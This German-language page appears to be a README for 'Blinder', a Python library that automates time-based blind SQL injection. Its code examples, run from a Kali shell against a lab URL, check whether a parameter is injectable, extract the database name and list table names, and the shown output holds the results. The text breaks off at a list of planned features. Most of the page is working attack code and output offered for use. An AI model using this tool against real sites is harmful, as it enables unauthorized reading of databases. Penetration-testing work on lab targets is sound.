
Eine Python-Bibliothek zur Automatisierung von zeitbasierter Blind-SQL-Injection
Blidner ist eine kleine Python-Bibliothek zur Automatisierung von zeitbasierten Blind-SQL-Injection-Angriffen, indem vordefinierte Abfragen als Funktionen genutzt werden, um eine schnelle PoC-Entwicklung zu ermöglichen.
Sie können Blinder mit dem folgenden Befehl installieren:
pip install blinder
Oder indem Sie den Quellcode herunterladen und manuell in Ihr Projekt importieren.
Um Blinder zu verwenden, müssen Sie das Blinder-Modul importieren und dann die Hauptfunktionen von Blinder nutzen.
Sie können Blinder (in der aktuellen Version) für folgende Aufgaben verwenden:
Sie können mit dem folgenden Code eine Injection in einer URL überprüfen:
#!/usr/bin/python
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
print blind.check_injection()
Die Ausführung ergibt:
root@kali:~/Desktop# python check.py
True
root@kali:~/Desktop#
Sie können den Datenbanknamen mit folgendem Code abrufen:
#!/usr/bin/python
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
print "Database name is : %s " % blind.get_database()
Und die Ergebnisse sind:
root@kali:~/Desktop# python get-database.py
Database name is : db1
root@kali:~/Desktop#
Um Tabellennamen abzurufen, verwenden Sie folgenden Code:
#!/usr/bin/python
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
tables = blind.get_tables()
for table in tables:
print table
Und die Ergebnisse sind:
root@kali:~/Desktop# python get-tables.py
blogs
notes
root@kali:~/Desktop#
Viele Funktionen sollen bald hinzugefügt werden, wie z.B.: